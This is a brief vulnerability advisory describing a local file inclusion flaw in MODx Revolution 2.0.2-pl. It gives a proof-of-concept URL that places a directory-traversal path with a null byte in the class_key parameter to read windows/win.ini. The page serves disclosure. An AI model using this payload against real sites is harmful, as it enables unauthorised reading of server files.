Home
Consulting
Advisories
Software
Articles
Contact

MODx Revolution 2.0.2-pl Local File Inclusion

Legacy Advisories

Description

A local file inclusion vulnerability in MODx Revolution 2.0.2-pl can be exploited to include arbitrary files.

Proof Of Concept

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00


Copyright © 2018 AutoSec Tools LLC